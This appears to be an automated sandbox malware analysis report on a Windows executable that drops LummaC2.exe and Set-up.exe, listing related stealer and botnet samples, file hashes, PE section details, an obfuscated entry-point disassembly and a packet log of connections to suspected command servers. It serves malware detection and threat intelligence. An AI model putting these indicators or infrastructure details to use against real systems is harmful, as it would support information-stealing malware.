	jklg6EIhyR.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	qr2JeuLuOQ.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
home.fortth14ht.top	8wiUGtm9UM.exe	Get hash	malicious	LummaC	Browse	185.121.15.192

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-AESUS	DRWgoZo325.exe	Get hash	malicious	LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, Vidar	Browse	3.218.7.103
	4o4t8dO4r1.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	xXe4fTmV2h.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	lolvgcpX19.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	8wiUGtm9UM.exe	Get hash	malicious	LummaC	Browse	34.226.108.155
	w6cYYyWXqJ.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	db0fa4b8db0333367e9bda3ab68b8042.x86.elf	Get hash	malicious	Gafgyt, Mirai	Browse	50.17.226.153
	mBr65h6L4w.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	HrIrtCXI3s.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	vJPhYDClT5.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
REDSERVICIOES	DRWgoZo325.exe	Get hash	malicious	LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, Vidar	Browse	185.121.15.192
	8wiUGtm9UM.exe	Get hash	malicious	LummaC	Browse	185.121.15.192
	vJPhYDClT5.exe	Get hash	malicious	Unknown	Browse	185.121.15.192
	jklg6EIhyR.exe	Get hash	malicious	Unknown	Browse	185.121.15.192
	qr2JeuLuOQ.exe	Get hash	malicious	Unknown	Browse	185.121.15.192
	E6rBvcWFWu.exe	Get hash	malicious	Unknown	Browse	185.121.15.192
	gDPzgKHFws.exe	Get hash	malicious	Cryptbot	Browse	185.121.15.192
	HFoyAy1tg8.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	185.121.15.192
	8kl5nJ3f9x.exe	Get hash	malicious	Cryptbot	Browse	185.121.15.192
	7kf4hLzMoS.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	185.121.15.192

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\LummaC2.exe	DRWgoZo325.exe	Get hash	malicious	LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, Vidar	Browse
C:\Users\user\AppData\Local\Temp\LummaC2.exe	8wiUGtm9UM.exe	Get hash	malicious	LummaC	Browse
C:\Users\user\AppData\Local\Temp\Set-up.exe	DRWgoZo325.exe	Get hash	malicious	LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, Vidar	Browse
C:\Users\user\AppData\Local\Temp\Set-up.exe	8wiUGtm9UM.exe	Get hash	malicious	LummaC	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Cph7VEeu1r.exe.log

Download File

Process:	C:\Users\user\Desktop\Cph7VEeu1r.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	425
Entropy (8bit):	5.353683843266035
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
MD5:	859802284B12C59DDBB85B0AC64C08F0
SHA1:	4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
SHA-256:	FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
SHA-512:	8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Temp\LummaC2.exe

Download File

Process:	C:\Users\user\Desktop\Cph7VEeu1r.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	299520
Entropy (8bit):	6.860310132420335
Encrypted:	false
SSDEEP:	6144:R5s/zt4HV88/rCatOZFABeDUbLv0uC8r9qMq2E9ND43F+ZnSi4:8rtsVPrNMG9qwENs8ZJ4
MD5:	607000C61FCB5A41B8D511B5ED7625D4
SHA1:	DFAA2BFEA8A51B14AC089BB6A39F037E769169D1
SHA-256:	C9831759E15B3A52238C03D0D51DB9DE0C1A6C7A61A51DE72C5869061172E9DB
SHA-512:	64940F02635CCBC2DCD42449C0C435A6A50BD00FA93D6E2E161371CDC766103EF858CCBAAE4497A75576121EA7BC25BA54A9064748F9D6676989A4C9F8B50E58
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 37%
Joe Sandbox View:	Filename: DRWgoZo325.exe, Detection: malicious, Browse Filename: 8wiUGtm9UM.exe, Detection: malicious, Browse
Reputation:	low
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...xZig............................ .............@..........................P............@.....................................................................(9...................................................................................text............................... ..`.rdata... ......."..................@..@.data...L....0...P..................@....reloc..(9.......:...X..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Set-up.exe

Download File

Process:	C:\Users\user\Desktop\Cph7VEeu1r.exe
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	6851208
Entropy (8bit):	6.451509958428788
Encrypted:	false
SSDEEP:	98304:ty1CDpiB/weoINcERH7q/70/ske9dKVyz8SC:jViB/NooB7edGG8SC
MD5:	2A99036C44C996CEDEB2042D389FE23C
SHA1:	4F1E624BCC030E44722DE26B72C8156BF57E14E8
SHA-256:	73AA5EE19F0EA048DCFF2F44D6FD5AC41C13E2D7E61371459E756836F72CAD43
SHA-512:	6907CD0E47293C8C96345ED00F2F3FA2241CE1671EE73A599837857BFB39F6C7E373AAD843CC78FB550D2DB10BDFE066A021CEC4C8A49AECDF06A7E71EDADEDD
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 26%
Joe Sandbox View:	Filename: DRWgoZo325.exe, Detection: malicious, Browse Filename: 8wiUGtm9UM.exe, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5mg...............(.hK...h..2............K...@...........................i......h...@... ..............................`e..-....................h.......e.`L...........................0d......................he. ............................text....gK......hK.................`..`.data...D(....K..*...lK.............@....rdata........O.. ....O.............@..@.eh_framdM....d..N....d.............@..@.bss.....1... e..........................idata...-...`e.......e.............@....CRT....0.....e......2e.............@....tls..........e......4e.............@....reloc..`L....e..N...6e.............@..B........................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.985770944153935
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Cph7VEeu1r.exe
File size:	6'175'232 bytes
MD5:	02e25b261f1a228df152eef5977c625c
SHA1:	8a8ad75e8d3a324dbe84f0911793d04eb73bc6ef
SHA256:	620a56b42afe5245088bbe070eab84b2ab6e5baaebb28be61c1cf339c7375006
SHA512:	ee3a466694c91eaa38f4583a9dac120e72bd0dc50a37a9ee23614206d7fc9a47d15605f580d9f12d3a5b7296f9f8aae6effa4e1eeb49dbb4a27d9eb7a2d3dc25
SSDEEP:	98304:4hys5d0VuZb//1l027sIM//W5MaIdMWVwRnhe8ObzNbzfHERRqyVF20SIdPOJcFh:4hyPu3l0TIaOySzZhFOPNfHEayVY0XP7
TLSH:	E45633BABA297958E023B03C6379D919B3323C8D7175841D6701B63E6E811FF6F52970
File Content Preview:	MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....mg.................<m.............. ...`m...@.. ..............................,.^...@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0xf1a000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE
Time Stamp:	0x676D92AB [Thu Dec 26 17:30:19 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F66E93CB8EAh
prefetchT2 byte ptr [esi+00h]
add byte ptr [eax], al
add byte ptr [eax], al
jmp 00007F66E93CD8E5h
inc ecx
push bx
dec esi
dec ebp
das
xor al, 36h
dec edi
bound ecx, dword ptr [ecx+4Ah]
dec edx
insd
push edi
dec eax
dec eax
jbe 00007F66E93CB952h
push esi
dec edx
popad
je 00007F66E93CB94Bh
push edx
dec esi
jc 00007F66E93CB95Ah
cmp byte ptr [ebx], dh
push edx
jns 00007F66E93CB927h
or eax, 49674B0Ah
cmp byte ptr [edi+43h], dl
jnc 00007F66E93CB92Dh
bound eax, dword ptr [ecx+30h]
pop edx
inc edi
push esp
push 43473163h
aaa
push edi
dec esi
xor ebp, dword ptr [ebx+59h]
push edi
push edx
pop eax
je 00007F66E93CB937h
xor dl, byte ptr [ebx+2Bh]
popad
jne 00007F66E93CB92Ch
dec eax
dec ebp
jo 00007F66E93CB923h
xor dword ptr [edi], esi
inc esp
dec edx
dec ebp
jns 00007F66E93CB930h
insd
jnc 00007F66E93CB950h
aaa
inc esp
inc ecx
inc ebx
xor dl, byte ptr [ecx+4Bh]
inc edx
inc esp
bound esi, dword ptr [ebx]
or eax, 63656B0Ah
jno 00007F66E93CB938h
push edx
insb
js 00007F66E93CB951h
outsb
inc ecx
jno 00007F66E93CB932h
push ebp
inc esi
pop edx
xor eax, dword ptr [ebx+36h]
push eax
aaa
imul edx, dword ptr [ebx+58h], 4Eh
aaa
inc ebx
jbe 00007F66E93CB92Ch
dec ebx
js 00007F66E93CB923h
jne 00007F66E93CB911h
push esp
inc bp
outsb
inc edx
popad
dec ebx
insd
dec ebp
inc edi
xor dword ptr [ecx+36h], esp
push 0000004Bh
sub eax, dword ptr [ebp+33h]
jp 00007F66E93CB93Ch
dec edx
xor bh, byte ptr [edx+56h]
bound eax, dword ptr [edi+66h]
jbe 00007F66E93CB91Ah
dec eax
or eax, 506C720Ah
aaa
xor dword ptr fs:[ebp+62h], ecx
arpl word ptr [esi], si
inc esp
jo 00007F66E93CB953h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6d8055	0x69	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x6d6000	0x53c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x6d81f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x2000	0x6d4000	0x43d600	98b7362d43780382829781a69bb8ae85	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x6d6000	0x53c	0x400	94e7a9f08120af54fe9f4f3a57d9776f	False	0.6845703125	data	5.691963027869899	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x6d8000	0x2000	0x200	6e9890d240b48e1a4145e7c2679977e3	False	0.150390625	data	1.0043697745670233	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x6da000	0x29c000	0x200	39cf462ccbab7b4bf54b1c3bf5090c2a	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
awwpolhe	0x976000	0x1a2000	0x1a1600	3c756bcf36de86d4235db23b8ce9f5a6	False	0.9945430658505541	data	7.953438660745263	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
xoofptqc	0xb18000	0x2000	0x400	2c756c5ca1be5bde86a924f3c2cd9992	False	0.7763671875	zlib compressed data	6.198173345985971	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0xb1a000	0x4000	0x2200	8206758692fc59d20ff518e725e94ddf	False	0.41004136029411764	DOS executable (COM)	4.310506871067172	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xb17000	0x244	data			0.4689655172413793
RT_MANIFEST	0xb17244	0x256	ASCII text, with CRLF line terminators			0.5100334448160535

Imports

DLL	Import
kernel32.dll	lstrcpy

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 27, 2024 08:53:06.871943951 CET	49705	443	192.168.2.8	3.218.7.103
Dec 27, 2024 08:53:06.871992111 CET	443	49705	3.218.7.103	192.168.2.8
Dec 27, 2024 08:53:06.872046947 CET	49705	443	192.168.2.8	3.218.7.103
Dec 27, 2024 08:53:06.875540972 CET	49705	443	192.168.2.8	3.218.7.103
Dec 27, 2024 08:53:06.875555038 CET	443	49705	3.218.7.103	192.168.2.8
Dec 27, 2024 08:53:08.625490904 CET	443	49705	3.218.7.103	192.168.2.8
Dec 27, 2024 08:53:08.626017094 CET	49705	443	192.168.2.8	3.218.7.103
Dec 27, 2024 08:53:08.626070023 CET	443	49705	3.218.7.103	192.168.2.8
Dec 27, 2024 08:53:08.627815008 CET	443	49705	3.218.7.103	192.168.2.8
Dec 27, 2024 08:53:08.627892017 CET	49705	443	192.168.2.8	3.218.7.103
Dec 27, 2024 08:53:08.629234076 CET	49705	443	192.168.2.8	3.218.7.103
Dec 27, 2024 08:53:08.629343987 CET	443	49705	3.218.7.103	192.168.2.8
Dec 27, 2024 08:53:08.636639118 CET	49705	443	192.168.2.8	3.218.7.103
Dec 27, 2024 08:53:08.636667013 CET	443	49705	3.218.7.103	192.168.2.8
Dec 27, 2024 08:53:08.697352886 CET	49705	443	192.168.2.8	3.218.7.103
Dec 27, 2024 08:53:08.957730055 CET	443	49705	3.218.7.103	192.168.2.8
Dec 27, 2024 08:53:08.957859039 CET	443	49705	3.218.7.103	192.168.2.8
Dec 27, 2024 08:53:08.957907915 CET	49705	443	192.168.2.8	3.218.7.103
Dec 27, 2024 08:53:08.958596945 CET	49705	443	192.168.2.8	3.218.7.103
Dec 27, 2024 08:53:08.958614111 CET	443	49705	3.218.7.103	192.168.2.8
Dec 27, 2024 08:53:19.294984102 CET	49706	80	192.168.2.8	185.121.15.192
Dec 27, 2024 08:53:19.414697886 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:19.414833069 CET	49706	80	192.168.2.8	185.121.15.192
Dec 27, 2024 08:53:19.416158915 CET	49706	80	192.168.2.8	185.121.15.192
Dec 27, 2024 08:53:19.535769939 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:19.535804033 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:19.535855055 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:19.535865068 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:19.535933018 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:19.535942078 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:19.535979033 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:19.536005020 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:19.536041975 CET	49706	80	192.168.2.8	185.121.15.192
Dec 27, 2024 08:53:19.536068916 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:19.536103964 CET	49706	80	192.168.2.8	185.121.15.192
Dec 27, 2024 08:53:19.536128044 CET	49706	80	192.168.2.8	185.121.15.192
Dec 27, 2024 08:53:19.536176920 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:19.536231995 CET	49706	80	192.168.2.8	185.121.15.192
Dec 27, 2024 08:53:19.655839920 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:19.655857086 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:19.655875921 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:19.655885935 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:19.655982971 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:19.656006098 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:19.656117916 CET	49706	80	192.168.2.8	185.121.15.192
Dec 27, 2024 08:53:19.699738979 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:19.699871063 CET	49706	80	192.168.2.8	185.121.15.192
Dec 27, 2024 08:53:19.819505930 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:19.819778919 CET	49706	80	192.168.2.8	185.121.15.192
Dec 27, 2024 08:53:19.859644890 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:19.859810114 CET	49706	80	192.168.2.8	185.121.15.192
Dec 27, 2024 08:53:19.979463100 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:19.979660034 CET	49706	80	192.168.2.8	185.121.15.192
Dec 27, 2024 08:53:20.139719963 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.139806986 CET	49706	80	192.168.2.8	185.121.15.192
Dec 27, 2024 08:53:20.339667082 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.339979887 CET	49706	80	192.168.2.8	185.121.15.192
Dec 27, 2024 08:53:20.436623096 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.436947107 CET	49706	80	192.168.2.8	185.121.15.192
Dec 27, 2024 08:53:20.437036991 CET	49706	80	192.168.2.8	185.121.15.192
Dec 27, 2024 08:53:20.459789991 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.460037947 CET	49706	80	192.168.2.8	185.121.15.192
Dec 27, 2024 08:53:20.556658983 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.556672096 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.556751013 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.556760073 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.556761026 CET	49706	80	192.168.2.8	185.121.15.192
Dec 27, 2024 08:53:20.556794882 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.556812048 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.556823969 CET	49706	80	192.168.2.8	185.121.15.192
Dec 27, 2024 08:53:20.556853056 CET	49706	80	192.168.2.8	185.121.15.192
Dec 27, 2024 08:53:20.556894064 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.556902885 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.556945086 CET	49706	80	192.168.2.8	185.121.15.192
Dec 27, 2024 08:53:20.557058096 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.557094097 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.557104111 CET	49706	80	192.168.2.8	185.121.15.192
Dec 27, 2024 08:53:20.557128906 CET	49706	80	192.168.2.8	185.121.15.192
Dec 27, 2024 08:53:20.557216883 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.557240009 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.557265997 CET	49706	80	192.168.2.8	185.121.15.192
Dec 27, 2024 08:53:20.557284117 CET	49706	80	192.168.2.8	185.121.15.192
Dec 27, 2024 08:53:20.557312965 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.557359934 CET	49706	80	192.168.2.8	185.121.15.192
Dec 27, 2024 08:53:20.557418108 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.557435036 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.557452917 CET	49706	80	192.168.2.8	185.121.15.192
Dec 27, 2024 08:53:20.557558060 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.557620049 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.557707071 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.557759047 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.557910919 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.557934999 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.558048964 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.558163881 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.558228970 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.558291912 CET	49706	80	192.168.2.8	185.121.15.192
Dec 27, 2024 08:53:20.558363914 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.558401108 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.558406115 CET	49706	80	192.168.2.8	185.121.15.192
Dec 27, 2024 08:53:20.558444977 CET	49706	80	192.168.2.8	185.121.15.192
Dec 27, 2024 08:53:20.558481932 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.558523893 CET	49706	80	192.168.2.8	185.121.15.192
Dec 27, 2024 08:53:20.558891058 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.558901072 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.558911085 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.558921099 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.558936119 CET	49706	80	192.168.2.8	185.121.15.192
Dec 27, 2024 08:53:20.558954000 CET	49706	80	192.168.2.8	185.121.15.192
Dec 27, 2024 08:53:20.558979988 CET	49706	80	192.168.2.8	185.121.15.192
Dec 27, 2024 08:53:20.579732895 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.579802036 CET	49706	80	192.168.2.8	185.121.15.192
Dec 27, 2024 08:53:20.623718023 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.623785973 CET	49706	80	192.168.2.8	185.121.15.192
Dec 27, 2024 08:53:20.676739931 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.676804066 CET	49706	80	192.168.2.8	185.121.15.192
Dec 27, 2024 08:53:20.676832914 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.676881075 CET	49706	80	192.168.2.8	185.121.15.192
Dec 27, 2024 08:53:20.676983118 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.677128077 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.677160978 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.677248001 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.677326918 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.677432060 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.677536964 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.677602053 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.677671909 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.677870035 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.677973986 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.678014040 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.678224087 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.678299904 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.678388119 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.678453922 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.678483963 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.678571939 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.678608894 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.678699970 CET	49706	80	192.168.2.8	185.121.15.192
Dec 27, 2024 08:53:20.678713083 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.678771019 CET	49706	80	192.168.2.8	185.121.15.192
Dec 27, 2024 08:53:20.678795099 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.678838015 CET	49706	80	192.168.2.8	185.121.15.192
Dec 27, 2024 08:53:20.678875923 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.678894997 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.678919077 CET	49706	80	192.168.2.8	185.121.15.192
Dec 27, 2024 08:53:20.678931952 CET	49706	80	192.168.2.8	185.121.15.192
Dec 27, 2024 08:53:20.679032087 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.679073095 CET	49706	80	192.168.2.8	185.121.15.192
Dec 27, 2024 08:53:20.679086924 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.679127932 CET	49706	80	192.168.2.8	185.121.15.192
Dec 27, 2024 08:53:20.679219007 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.679258108 CET	49706	80	192.168.2.8	185.121.15.192
Dec 27, 2024 08:53:20.679264069 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.679305077 CET	49706	80	192.168.2.8	185.121.15.192
Dec 27, 2024 08:53:20.679353952 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.679371119 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.679393053 CET	49706	80	192.168.2.8	185.121.15.192
Dec 27, 2024 08:53:20.679425955 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.679464102 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.679579020 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.679596901 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.679709911 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.679719925 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.679816008 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.679825068 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.679868937 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.679898977 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.680011034 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.680027962 CET	80	49706	185.121.15.192	192.168.2.8
Dec 27, 2024 08:53:20.680085897 CET	80	49706	185.121.15.192	192.168.2.8
